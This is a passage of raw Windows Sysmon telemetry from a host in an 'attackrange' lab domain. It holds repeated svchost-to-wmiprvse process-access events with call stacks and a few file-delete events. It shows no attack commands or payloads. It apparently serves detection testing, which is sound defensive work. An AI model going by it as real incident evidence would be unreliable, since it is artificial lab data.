TEM32\ntdll.dll+51781 10341000x8000000000000000292616Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292615Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292614Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292613Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292612Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292611Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292610Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292609Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292608Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292607Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292606Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292605Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292604Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292603Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292602Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292601Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292600Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292599Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292598Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292597Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292596Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.373{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292595Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.357{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05A90A6DDC4F1CD2CC045FC4B9196EF9,SHA256=B28091301CDC4D47F0915CE17ABF7F956575063E1ABAF08676F25DB799DCCD17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292594Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.342{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\aborted-session-pingMD5=C43EE20DAEBFC31A23A1388FD6C090E1,SHA256=77A7E1067906FBDB38D8AA65AFB68FE913AE75042B58DBE4C09E9B8BC49C37E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292593Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.288{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9101EBFFCDE78CF218B35E880322E102,SHA256=C1A614900D3E18B07A5FA91599AB98CF2EA4B58E0A07127BE4DEE271D29E4232,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292592Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292591Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292590Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 